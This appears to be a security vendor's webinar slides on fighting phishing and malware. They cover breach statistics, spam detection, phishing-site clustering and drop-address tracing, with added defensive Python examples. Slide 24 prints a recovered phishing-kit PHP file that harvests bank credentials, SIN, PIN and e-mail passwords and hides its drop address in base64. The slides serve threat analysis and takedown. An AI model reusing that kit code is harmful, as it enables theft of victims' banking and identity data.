
CONFIDENTIAL 1

Thank you for joining us today for

How to Fight Cybercrime with Enterprise Security Intelligence

The webinar will begin shortly…

CONFIDENTIAL 2

What do you do with an Infected PC?

Some organizations say: “Our policy is to re-image the computer. No exceptions.”

• Does that sound familiar?

• We hear the argument that this is the safest option.

• What’s the worst that can happen?

CONFIDENTIAL 3

What is the Worst Case Scenario?

CONFIDENTIAL 4

What is YOUR worst case scenario?

Data breach involving Intellectual Property?

Direct Financial Loss?

Data Breach Involving PII?

CONFIDENTIAL 5

Verizon 2013 Data Breach Investigations Report

Study of 47,000 security incidents with 621 confirmed data breaches, of which

40% were caused by malware

47% of those malware attacks originated with an E-mail attachment

In Large Enterprises, 63% of malware attacks originated with an Email attachment.

“Keep in mind that these vectors are not mutually exclusive. In many cases, an actor may gain initial entry using a malicious e-mail attachment and then install additional malware on that and other systems throughout the environment.”

CONFIDENTIAL 6

The Inevitable Click

• How many emails do I have to send your employees to get someone to click?

• If I send 3: 50% chance. If I send 10: guaranteed.

Source: ThreatSim.com, quoted in the Verizon DBIR

CONFIDENTIAL 7

Recent Threats

CONFIDENTIAL 8

Top malicious spam: Yesterday

From: "Gregorio Mack" <[email protected]>
Subject: FW: Invoice 0043412

CONFIDENTIAL 9

This is what the AV detection looked like for yesterday morning’s most prevalent malicious spam campaign.

One and a half hours into the campaign, detection was only 4 of 48 vendors.

CONFIDENTIAL 10

Same malware, 18 hours later: now 26 of 48 vendors detect it.

CONFIDENTIAL 11

ATTACK!

Now, what if AFTER all of that has happened, we realize that the original email had a malicious attachment, and so we send a PC tech to format the machine of the initial victim? Re-imaging that one box removes the evidence of how the attacker got in, and does nothing about the other systems the attacker has already moved to.

CONFIDENTIAL 12

Long Detect Times

• Mandiant reported in M-Trends 2013: Attack the Security Gap that the median number of days from evidence of compromise to discovery of compromise was 243 DAYS!

• General Keith Alexander told an audience at Georgia Tech:

“Most of the folks who get into the [DoD] networks are in there for six to nine months before they’re discovered.”

CONFIDENTIAL 13

Malware Intelligence

1. What CAN THIS MALWARE DO?
2. Where did it come from?
   a) What was the initial attack vector?
   b) Has that vector contacted any other resource?
3. What does this computer HAVE ACCESS TO?
4. What has the compromised computer DONE?
   a) Received additional files?
   b) Exfiltrated data?
   c) Are there any new accounts or files since the compromise?
   d) Exceeded or attempted to exceed authority on any internal resources?

CONFIDENTIAL 14

Today’s Top Threat

• Each day we document the behavior of the most prevalent malicious spam campaigns, reviewing interactions with the file system, network traffic, and registry changes.
  – What is the spam subject?
  – What hostile URLs are advertised?
  – What hostile attachments are present?
  – What network touches does the malware make?
  – What additional malware drops if executed?

CONFIDENTIAL 15

What is Cyber Intelligence?

The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision making.

CONFIDENTIAL 16

Email-based Threats

CONFIDENTIAL 17

http://www.go-polymers.com/components/rbc/index.php

February 27, 2013

CONFIDENTIAL 18

http://www.go-polymers.com/flash/hsbc.com.bh12idv/Authentication/idv.Authentication.htm

February 27, 2013

CONFIDENTIAL 19

http://www.go-polymers.com/admin/authentication.bns_Scotiabank/authentication.bns.htm

February 22, 2013

CONFIDENTIAL 20

Phishing Timeline (Takedown View)

GOAL: Protect customer credentials by improving takedown speed. Time is money.

CONFIDENTIAL 21

Phishing Clusters

• For a single brand, we group the many attacks into clusters of similar phish.
• Phishing sites in the same cluster are composed of highly-similar file sets.
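One way to build such clusters, as an added example that is not Malcovery's code: represent each phishing site by the set of files (path plus content hash) recovered from it, score pairs of sites with Jaccard similarity, and link any pair above a threshold into the same cluster. The slide does not say which similarity measure or threshold Malcovery uses; Jaccard over path:hash pairs, the 0.6 threshold, and the site names and hash values below are all assumptions constructed for illustration.

```python
# Added example (not Malcovery's code): cluster phishing sites by similarity
# of their file sets. A site is the set of "path:hash-prefix" strings seen on
# it; sites whose sets overlap strongly (Jaccard >= threshold) are linked and
# each connected component is one cluster of "highly-similar file sets".
# Site names, paths and hash prefixes below are constructed for illustration.
from __future__ import annotations
from itertools import combinations


def jaccard(a: frozenset, b: frozenset) -> float:
    """Jaccard similarity |A & B| / |A | B|; two empty sets score 0.0."""
    if not a and not b:
        return 0.0
    return len(a & b) / len(a | b)


def cluster_sites(sites: dict[str, frozenset], threshold: float = 0.6) -> list[set[str]]:
    """Single-linkage clustering with union-find: two sites are linked when
    their file sets reach the similarity threshold (0.6 is an assumed value);
    clusters are returned largest first, then by name."""
    parent = {site: site for site in sites}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path compression
            x = parent[x]
        return x

    for s1, s2 in combinations(sites, 2):
        if jaccard(sites[s1], sites[s2]) >= threshold:
            parent[find(s1)] = find(s2)

    groups: dict[str, set[str]] = {}
    for site in sites:
        groups.setdefault(find(site), set()).add(site)
    return sorted(groups.values(), key=lambda g: (-len(g), sorted(g)))


# Constructed sample: one bank-brand kit reused on two compromised hosts (the
# second with a swapped logo), a second kit on two hosts (one with an extra
# page), and one unrelated site.
KIT_RBC = {"index.php:3f1a", "confirm.php:9c0d", "css/rbc.css:77e2",
           "img/logo.png:a4b5", "done.php:c61f"}
SITES = {
    "site-1.example": frozenset(KIT_RBC),
    "site-2.example": frozenset((KIT_RBC - {"img/logo.png:a4b5"}) | {"img/logo.png:1d2e"}),
    "site-3.example": frozenset({"login.htm:0b8c", "process.php:5e5e", "style.css:d00d"}),
    "site-4.example": frozenset({"login.htm:0b8c", "process.php:5e5e",
                                 "style.css:d00d", "thanks.htm:ee01"}),
    "site-5.example": frozenset({"auth.php:8888", "lib/helper.php:9999"}),
}

if __name__ == "__main__":
    for n, cluster in enumerate(cluster_sites(SITES), start=1):
        print(f"cluster {n}: {sorted(cluster)}")
```

Hashing file contents rather than comparing names matters because kit authors rename pages freely but rarely rewrite the brand's CSS and images; raising the threshold splits a cluster into kit variants, lowering it merges variants of the same kit.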

CONFIDENTIAL 22

Trend Analysis

By using the Conditional Formatting feature in i2 (IBM i2 Analyst's Notebook), we can identify emerging threats.

Phishing sites that were identified in the current month are red and enlarged, while older phish are grayed out.

CONFIDENTIAL 23

Phishing Kits

Phishing sites are usually made by compromising an existing web site and uploading a set of files necessary to create the look and feel of the brand being imitated.

Action files, usually with a .PHP extension, handle the business of sending the stolen data to the criminal via an email message.

When a criminal has a kit that proves successful, they tend to re-use the kit until something stops them.

CONFIDENTIAL 24

Confirm.php (the kit's action file, as recovered from the phishing site; the mail() call that follows these lines is not shown on the slide)

<?php
// Fields posted from the fake RBC login page: credentials, challenge
// questions, SIN (Canadian Social Insurance Number), date of birth,
// driver's licence, card PIN and the victim's e-mail login.
$ip = $_SERVER['REMOTE_ADDR'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$q1 = $_POST['q1'];
$a1 = $_POST['a1'];
$q2 = $_POST['q2'];
$a2 = $_POST['a2'];
$q3 = $_POST['q3'];
$a3 = $_POST['a3'];
$sin1 = $_POST['sin1'];
$sin2 = $_POST['sin2'];
$sin3 = $_POST['sin3'];
$dobd = $_POST['dobd'];
$dobm = $_POST['dobm'];
$doby = $_POST['doby'];
$dl = $_POST['dl'];
$issue = $_POST['issue'];
$pin = $_POST['pin'];
$email = $_POST['email'];
$emailp = $_POST['emailp'];

// Body of the message that carries the stolen data to the criminal.
$data = "--------- G00dLuck ---------
User: $user
Pass: $pass
-----
Q1: $q1
A1 $a1
Q2: $q2
A2 $a2
Q3: $q3
A3 $a3
----
Dob: $dobd - $dobm - $doby
SIN : $sin1 - $sin2 - $sin3
Dl : $dl Pin: $pin Issue: $issue
E-mail: $email / $emailp
--
Ip: $ip
--------- G00dLuck ---------";

// Drop addresses, base64-encoded so they are not visible at a glance.
// The second slot is left empty in this kit.
$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
$emailusr2 = base64_decode('');

// Subject line: brand tag plus a few stolen fields for quick triage.
$subj = "RBC # $user - $pass - $doby - $dl";

The drop address is the give-away:

$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');

Which decodes to: [email protected]

CONFIDENTIAL 25

Overlaying Drop Email data

• Each red dot indicates a criminal’s email address.
• More lines = more phishing sites for that address.
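The two steps behind these last slides (recover the drop address hidden in an action file like Confirm.php, then count how many sites feed each address) can be automated. The following is an added example, not Malcovery's tooling: it finds base64_decode('...') literals and plaintext addresses in PHP source, decodes the literals, and tallies sites per address. The kit snippets, hostnames and drop addresses it uses are constructed for illustration and are not the ones from the slides.

```python
# Added example (not Malcovery's code): pull the criminal's "drop" e-mail
# address out of a phishing kit's action file and count how many phishing
# sites send to each address. Kits commonly hide the address inside
# base64_decode('...'); decoding the literal recovers it. Kit sources,
# hostnames and addresses below are constructed for illustration.
import base64
import binascii
import re
from collections import Counter

# base64_decode('...') or base64_decode("...") with a base64-alphabet literal
B64_CALL = re.compile(r'''base64_decode\(\s*['"]([A-Za-z0-9+/=]*)['"]\s*\)''')
PLAIN_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def drop_addresses(php_source: str) -> set[str]:
    """Return e-mail addresses in a kit's action file: plaintext ones and
    ones hidden in base64_decode() literals. Empty literals (an unused second
    slot, as in many kits) and undecodable literals are skipped."""
    found = set(PLAIN_EMAIL.findall(php_source))
    for literal in B64_CALL.findall(php_source):
        if not literal:
            continue
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a well-formed base64 string, leave it
        found.update(PLAIN_EMAIL.findall(decoded))
    return found


def sites_per_address(kits: dict[str, str]) -> Counter:
    """Map each drop address to the number of phishing sites whose action
    file sends to it: the 'more lines = more sites' overlay as a table."""
    counts: Counter = Counter()
    for _site, source in kits.items():
        for addr in drop_addresses(source):
            counts[addr] += 1
    return counts


# Constructed sample kits. 'ZHJvcDFAZXhhbXBsZS5uZXQ=' is base64 for
# drop1@example.net and 'b3RoZXJAZXhhbXBsZS5vcmc=' for other@example.org.
KIT_RBC = """<?php
$data = "User: $user Pass: $pass Ip: $ip";
$emailusr1 = base64_decode('ZHJvcDFAZXhhbXBsZS5uZXQ=');
$emailusr2 = base64_decode('');
$subj = "RBC # $user - $pass";
mail($emailusr1, $subj, $data);
"""
KIT_RBC_PLAIN = """<?php
// same criminal, second site, address left in the clear
mail("drop1@example.net", "RBC # $user", $data);
"""
KIT_BNS = """<?php
$to = base64_decode("b3RoZXJAZXhhbXBsZS5vcmc=");
mail($to, "BNS # $user", $data);
"""
KITS = {
    "hacked-site-a.example/rbc/confirm.php": KIT_RBC,
    "hacked-site-b.example/components/rbc/confirm.php": KIT_RBC_PLAIN,
    "hacked-site-c.example/admin/bns/next.php": KIT_BNS,
}

if __name__ == "__main__":
    for addr, n in sites_per_address(KITS).most_common():
        print(f"{n:3d} site(s) -> {addr}")
```

Running the extractor over every action file recovered during takedowns turns the red-dot overlay into a ranked list; the addresses at the top are the ones worth the "drive major criminals away from our brand" effort, and any new site whose action file decodes to a known address is immediately attributable to that actor.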

CONFIDENTIAL 26

Phishing Timeline (Intelligence View)

GOAL: Drive Major Criminals Away from OUR BRAND

CONFIDENTIAL 27

https://PhishIQ.com/submit

• We’re always looking for new sources of phishing or spam data.
• An online form is available, but feel free to contact us if you are a high-volume contributor.

CONFIDENTIAL 28

Thank you!

Shortly after the webinar, these slides will be available where you registered at:

http://info.malcovery.com/fight-cybercrime-with-enterprise-security-intelligence

Connect with us on LinkedIn by joining the group Enterprise Security Intelligence and Big Data

Follow us on Twitter: @malcovery

CONFIDENTIAL 29

Best Case Scenario

• Malware was detected today
• A clear source of infection is readily identifiable from today
• Only a single “unexplained” EXE or DLL is found on the machine, and it matches the signature
• The malware is well understood, widely detected, and has a clear and limited purpose

CONFIDENTIAL 30

Our Porous Perimeters

• Is the machine mobile?
• Is it “forced VPN” back to our organization?
• If mobile, and if unlimited access – we don’t know what it did at or outside the perimeter because we don’t control the perimeter
• Home network, Starbucks wifi, hotel wifi – data exfil could occur in places where we don’t monitor the network